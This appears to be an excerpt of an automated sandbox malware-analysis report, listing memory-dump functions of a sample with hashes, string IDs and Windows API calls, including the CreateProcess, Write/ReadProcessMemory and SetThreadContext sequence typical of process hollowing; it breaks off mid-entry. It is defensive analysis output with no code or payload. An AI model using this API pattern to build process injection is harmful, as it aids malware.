                                                        • Opcode ID: 766568a4d5566c2cecda1a6b95561f5decc615e1ab60d9734776fea301b21687
                                                        • Instruction ID: 9668a7e86c8eeb83575bc2c1595580c01fbc341a7f73a19e745eee2130e40aed
                                                        • Opcode Fuzzy Hash: 766568a4d5566c2cecda1a6b95561f5decc615e1ab60d9734776fea301b21687
                                                        • Instruction Fuzzy Hash: D3B2C475E00628CFDB54DF69C984AD9BBB2FF89304F1581E9E509AB225DB319E81CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        control_flow_graph 3161, first node 6d37a20-6d37a43 (node and edge listing omitted)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q$)"
                                                        • API String ID: 0-4031938444
                                                        • Opcode ID: 4faed6147cacc38f452498a1f86029a67b2be3a729283f655a46d7126433f8c9
                                                        • Instruction ID: 8c145fe9f8f4dbfb7b30dc1977c4027cb3b07522bebf4abfb3b690f5e90db846
                                                        • Opcode Fuzzy Hash: 4faed6147cacc38f452498a1f86029a67b2be3a729283f655a46d7126433f8c9
                                                        • Instruction Fuzzy Hash: AD81D5B4E006199FDB48CFEAC984AAEFBB2FF88300F14942AD519AB354D7349945CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tIh
                                                        • API String ID: 0-443931868
                                                        • Opcode ID: 9427bdded998bb2c40b3af16a7696beddc83af4c64e82aa447f07ae1159ca529
                                                        • Instruction ID: a0a8f08f73f01ab7168097b994bedd9056d75eebb851dc91d19eea95c335e35c
                                                        • Opcode Fuzzy Hash: 9427bdded998bb2c40b3af16a7696beddc83af4c64e82aa447f07ae1159ca529
                                                        • Instruction Fuzzy Hash: BBD15770E0521ADFDB44CF9AD4948AEFBB2FF88300B14D559D512AB214E774EA82CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f145c6049a046d58414f990b9a42e8941bdee72adc50467502ae09c52def9cf1
                                                        • Instruction ID: d3cdc876d487cddf33572d584bb5294550da97245cb27b576c3f4d9f84ecf7c7
                                                        • Opcode Fuzzy Hash: f145c6049a046d58414f990b9a42e8941bdee72adc50467502ae09c52def9cf1
                                                        • Instruction Fuzzy Hash: 50721C70A00219CFCB54EF68C994AADB7B2FF89310F1586A9D459AB351DB30ED85CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a074d81bf4e5a5a459479280e1678d291f994690b289c1cc636e4d7acb9ee23a
                                                        • Instruction ID: 791788d545657b622885a7c842b6e5572542b342cba8fb45465bf010e67b220e
                                                        • Opcode Fuzzy Hash: a074d81bf4e5a5a459479280e1678d291f994690b289c1cc636e4d7acb9ee23a
                                                        • Instruction Fuzzy Hash: 4D810074E1422ADFDB44CFA9C8809AEFBB2FB88300F10955AD455BB254D7789906CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 190a6c800bebeb0475f3fcc2ccef6c70b65e8b79840376913d13183846486bb7
                                                        • Instruction ID: b5f20d8ddab4af924f5dc53a1f700c51d270d0fcd6ae4b5c406f4dba3b058f07
                                                        • Opcode Fuzzy Hash: 190a6c800bebeb0475f3fcc2ccef6c70b65e8b79840376913d13183846486bb7
                                                        • Instruction Fuzzy Hash: E331AFB1D056588BD709EFAE895429EFBF2EFC9300F18C17AC4595F269DB300946CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ad7e3e64074a1bc55f4460ef504cc7a08185fe58b78336b2c5b616770d0d61d
                                                        • Instruction ID: b2d84e7475e400060d53da45eb1033614617ef0b8255325bc7d529fef41669ba
                                                        • Opcode Fuzzy Hash: 3ad7e3e64074a1bc55f4460ef504cc7a08185fe58b78336b2c5b616770d0d61d
                                                        • Instruction Fuzzy Hash: 0A214AB1E056088BEB1CDFABC80429EBBF7AFC9300F04C07AD5186B268EB700546CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a5c368c507c1e84f0a9c8cd9616f12a8b3b6fe119b5b6a8787452387c67ebf9
                                                        • Instruction ID: 47771195c059e6db30c804b56bcba48fa3ddf65820fa69f6b210844710c8b32b
                                                        • Opcode Fuzzy Hash: 5a5c368c507c1e84f0a9c8cd9616f12a8b3b6fe119b5b6a8787452387c67ebf9
                                                        • Instruction Fuzzy Hash: EF11E971E056188BEB5CDFABD90429EBAF7AFC9300F04C07A9519AB258EB740946CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        control_flow_graph 745, first node 7fdf58-7fdfef (node and edge listing omitted)
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 007FDFDE
                                                        • GetCurrentThread.KERNEL32 ref: 007FE01B
                                                        • GetCurrentProcess.KERNEL32 ref: 007FE058
                                                        • GetCurrentThreadId.KERNEL32 ref: 007FE0B1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 6612569eb14df7c8bb1739eed2bdc98bf4436d8a2eef00e71ab7778cd55f6408
                                                        • Instruction ID: b476098ec1d546ddd7e0d889012a29374282f2d6ccc278552378a009095b3f31
                                                        • Opcode Fuzzy Hash: 6612569eb14df7c8bb1739eed2bdc98bf4436d8a2eef00e71ab7778cd55f6408
                                                        • Instruction Fuzzy Hash: F65167B0900209CFDB14DFA9D548BEEBBF1EF88314F208569E419A7360DB749984CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        control_flow_graph 768, first node 7fdf60-7fdfef (node and edge listing omitted)
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 007FDFDE
                                                        • GetCurrentThread.KERNEL32 ref: 007FE01B
                                                        • GetCurrentProcess.KERNEL32 ref: 007FE058
                                                        • GetCurrentThreadId.KERNEL32 ref: 007FE0B1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 8ca87177092eedb9c2d571519db9512239acd6afeb6f0fbacc71b25ac5527fa4
                                                        • Instruction ID: eeeb864c0b05e1dcfcf484bd74e7ea42cb2ce50598ce6d81fe329812f55c3bb6
                                                        • Opcode Fuzzy Hash: 8ca87177092eedb9c2d571519db9512239acd6afeb6f0fbacc71b25ac5527fa4
                                                        • Instruction Fuzzy Hash: E15168B0900209CFDB14DFA9D548BEEBBF1EF48314F208569E419A7360CB749984CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        control_flow_graph 790, first node 6a19d5f-6a19dfa (node and edge listing omitted)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: 220c95b6b9e8e973d45f42400d239a06ac5e5f18077b7cba4ce073e26f64e4e5
                                                        • Instruction ID: 5b273153b47125007f0dcee7e60e457b4e4a7a2db7b7b5f74bbff16afc87fd9a
                                                        • Opcode Fuzzy Hash: 220c95b6b9e8e973d45f42400d239a06ac5e5f18077b7cba4ce073e26f64e4e5
                                                        • Instruction Fuzzy Hash: 2341D178E01228CFEB68DF64D994B99B7B2BB49300F1080D9E549AB394CB315E85CF42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        control_flow_graph 3237, first node 6a12778-6a127ae (node and edge listing omitted)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q$PH^q
                                                        • API String ID: 0-1598597984
                                                        • Opcode ID: 636a6d12a82257a794e3eb3fc9988c5ecc9bb95f705d24f1dec906caca57eee1
                                                        • Instruction ID: 99a5809989433491c6541cac777198d8e285c5712532e0b00768a68fca3573d6
                                                        • Opcode Fuzzy Hash: 636a6d12a82257a794e3eb3fc9988c5ecc9bb95f705d24f1dec906caca57eee1
                                                        • Instruction Fuzzy Hash: C5C1E734A002148FCB54EF68D558AADBBF2FF88310B1545A8E506EF3A1DB31ED85CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q
                                                        • API String ID: 0-3743469327
                                                        • Opcode ID: 0e84ac9a987ed7134880b61a9a2ac4b0c033db5b5b8bdc5ee5cec3649e7bf1da
                                                        • Instruction ID: 5f7dbd631cc183857dcc5b9b39040b2390696ad96be25df0b804905ece21e1e3
                                                        • Opcode Fuzzy Hash: 0e84ac9a987ed7134880b61a9a2ac4b0c033db5b5b8bdc5ee5cec3649e7bf1da
                                                        • Instruction Fuzzy Hash: 15514978E05218CFDB94EFA8D544BEDBBF6BB49300F205029E60AAB355DB745A44CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q
                                                        • API String ID: 0-3743469327
                                                        • Opcode ID: 7c22fb2c7328ef5e4dbb4d5b6b0e8cb88798ccde97d0e782d9dbbf62a9f45923
                                                        • Instruction ID: 1afad2ecb393d4904300b6630eb165c08a24e6c51699dc9cbe44de1c82c80d46
                                                        • Opcode Fuzzy Hash: 7c22fb2c7328ef5e4dbb4d5b6b0e8cb88798ccde97d0e782d9dbbf62a9f45923
                                                        • Instruction Fuzzy Hash: 2C514A78E05208CFDB94EFA8D544BEDB7B6BB49300F205059E60AAB395DB745A44CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ED62E6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 7dd1b0185c343a369fd444353f4b0994628ea54499a4b65d67659f659e5d4fef
                                                        • Instruction ID: 74e9dcf2b9cb612c6cede37632d2cbc28df0b2d309b0612440a5732a6dfa4b44
                                                        • Opcode Fuzzy Hash: 7dd1b0185c343a369fd444353f4b0994628ea54499a4b65d67659f659e5d4fef
                                                        • Instruction Fuzzy Hash: BDA16971D00319CFDB60CFA8C845BEEBBB2BF48314F0485A9E849A7250DB749986CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ED62E6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 013e7b940152152b21cb74f84ca30c8cf722482b04bcff7b3ca9f1686f9d4d30
                                                        • Instruction ID: 9f47f519692450c17ab04143db29130dcfb54def1fc3c59a5274d9a05e7b0017
                                                        • Opcode Fuzzy Hash: 013e7b940152152b21cb74f84ca30c8cf722482b04bcff7b3ca9f1686f9d4d30
                                                        • Instruction Fuzzy Hash: B7916971D00319CFDB50CFA8C845BEEBBB2BF48314F1495A9E858A7250DB749986CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 007FBF1E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 4e85bac419749aa30885c018987ca548e6f45d00b617b4a75185d302e2724bc7
                                                        • Instruction ID: 095eaf96abc367c839e0229f26b35f35ff24c2d77f645b3d64eb27222eada808
                                                        • Opcode Fuzzy Hash: 4e85bac419749aa30885c018987ca548e6f45d00b617b4a75185d302e2724bc7
                                                        • Instruction Fuzzy Hash: 6D811370A00B098FDB24DF29D44576ABBF1BF88304F10892DD58ADBB50D779E94ACB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 023F2922
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1762855295.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_23f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: df6ae21d732db2b8bfd5590a9408fd74d8a77098e32a2273d8441fb9cb2db841
                                                        • Instruction ID: 6fb70334c0b186d4503e75229e35d37409ce0be1af8362ee29999cf2bde3fea5
                                                        • Opcode Fuzzy Hash: df6ae21d732db2b8bfd5590a9408fd74d8a77098e32a2273d8441fb9cb2db841
                                                        • Instruction Fuzzy Hash: AD51CDB1D00349DFDB14CFAAD984ADEBFB5BF48314F24812AE919AB210D7719885CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 023F2922
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1762855295.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_23f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 0b95543c6e97d55450083251dc4c597ae03f8ac311849eb5d1c79dea00f5be21
                                                        • Instruction ID: 436e5b9cfbc00c4b94ce7d9f79dd41c5af6e464271af342d7c2e3e397598bfa5
                                                        • Opcode Fuzzy Hash: 0b95543c6e97d55450083251dc4c597ae03f8ac311849eb5d1c79dea00f5be21
                                                        • Instruction Fuzzy Hash: 9F41BDB1D00309DFDB14CFAAD984ADEBFB5BF48314F24812AE919AB210D7749885CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 023F4EA1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1762855295.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_23f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: 1325de5fafb4f0862ced75df4d611dc4bad39d7e4b758168bf6c35bafdd195ff
                                                        • Instruction ID: 348c6733bbd3c9d7dc0cc577589baab7b4be7639ed063a5e66ca5e3105179dd0
                                                        • Opcode Fuzzy Hash: 1325de5fafb4f0862ced75df4d611dc4bad39d7e4b758168bf6c35bafdd195ff
                                                        • Instruction Fuzzy Hash: 014127B8A00205DFCB54CF99D488BABBBF5FB98314F24C459D619AB321D375A840CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 007F5DC9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 511f5e500c7aea60b104fed59605395a704a359cbbdaf12ec3203418b73e765f
                                                        • Instruction ID: 886952cd429f3f69df5aa19284a47afc3b5c90c9118097605d5c935414cf2c41
                                                        • Opcode Fuzzy Hash: 511f5e500c7aea60b104fed59605395a704a359cbbdaf12ec3203418b73e765f
                                                        • Instruction Fuzzy Hash: DD41E2B0C0071DCBDB24CFA9C884B9EBBB5BF48304F24816AD518AB255DB796945CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 007F5DC9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 8854b8b0d6a220e8ef1f88aa349651db09c41a4da2c3d0500192368db7038e3c
                                                        • Instruction ID: 9fa72b6b0387270b27383f1eb14ec2d4b40f6807b74e3177174b5ac6633fb1ec
                                                        • Opcode Fuzzy Hash: 8854b8b0d6a220e8ef1f88aa349651db09c41a4da2c3d0500192368db7038e3c
                                                        • Instruction Fuzzy Hash: E441D1B0C0061DCFDB24CFA9C884BDEBBB5BF49304F24816AD518AB255DB755986CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,068F9EC5,?,?), ref: 068F9F77
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768181256.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_68f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DrawText
                                                        • String ID:
                                                        • API String ID: 2175133113-0
                                                        • Opcode ID: dd63289258ac5548c54a40ebfab6d03dd1e9cc7f714d6bba37530efad80a97d0
                                                        • Instruction ID: 8d7b6e9c37e6bf83dd8192155f0756fbd60a80035471d9c128f8eafab7710483
                                                        • Opcode Fuzzy Hash: dd63289258ac5548c54a40ebfab6d03dd1e9cc7f714d6bba37530efad80a97d0
                                                        • Instruction Fuzzy Hash: DE31E2B5D002099FDB50CF9AD884ADEFBF4FB48310F14842AEA19A7210D374A944CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ED5AB8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: c7e9f9e1a27c914f9d887f73910afb1649801829c9d6948bdf4ee436c787c601
                                                        • Instruction ID: 5e48139b46c45b55cbe65e8576cf44c747884b5389861604e6d521f63dc33d68
                                                        • Opcode Fuzzy Hash: c7e9f9e1a27c914f9d887f73910afb1649801829c9d6948bdf4ee436c787c601
                                                        • Instruction Fuzzy Hash: 8A2146B19003599FCB10CFA9C885BEEBFF5FF48310F108429E959A7240C7789944CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,068F9EC5,?,?), ref: 068F9F77
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768181256.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_68f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DrawText
                                                        • String ID:
                                                        • API String ID: 2175133113-0
                                                        • Opcode ID: 77f888837332cad3dbee418c56ce4f56819bab741d8eb5a8b6d65ce530ff94a0
                                                        • Instruction ID: 941c307057bc39de270647d20714409d63aca7773193d3c49348918634d39339
                                                        • Opcode Fuzzy Hash: 77f888837332cad3dbee418c56ce4f56819bab741d8eb5a8b6d65ce530ff94a0
                                                        • Instruction Fuzzy Hash: 5F31C0B5D012499FDB50CF9AD884ADEBBF5FF48320F14842AEA19A7311D774A944CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ED5AB8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 01da3d163821af04dfbcd44ea950d4356767d6e7afa5096ec03f3bb83d73bd23
                                                        • Instruction ID: 6a4593d421921412b4ab1618a017c94a07e153b3da5c61e58ca2a4d43d7356f2
                                                        • Opcode Fuzzy Hash: 01da3d163821af04dfbcd44ea950d4356767d6e7afa5096ec03f3bb83d73bd23
                                                        • Instruction Fuzzy Hash: AA2125B19003599FCB10CFA9C885BEEBBF5FF48314F10842AE959A7250C7789945CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007FE22F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 961bd5704f035c24d8e993b03416c62d4d6202c3aef26b79371dd70b2f6874c6
                                                        • Instruction ID: 4a7f02f1d19b6b20971611a755e30664f0069f338368574a72ca412b3d95909f
                                                        • Opcode Fuzzy Hash: 961bd5704f035c24d8e993b03416c62d4d6202c3aef26b79371dd70b2f6874c6
                                                        • Instruction Fuzzy Hash: DE21E5B59002189FDB10CFA9D984AEEBBF8FB48310F14841AE954A7350D378A944CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ED5B98
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: ba030c0d6814e2cf91f245de2ad4e7e333e6c3b7e478eecca2c0e4d1687bbb2c
                                                        • Instruction ID: 656eae4aab356d4fa64304e400cad3d4724dc000e4e7d0242733956712f777f5
                                                        • Opcode Fuzzy Hash: ba030c0d6814e2cf91f245de2ad4e7e333e6c3b7e478eecca2c0e4d1687bbb2c
                                                        • Instruction Fuzzy Hash: 0C2128B1C003599FDB10CFA9C885AEEBBF5FF88310F10842AE959A7250C7749955DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ED590E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ED5B98
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ED590E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
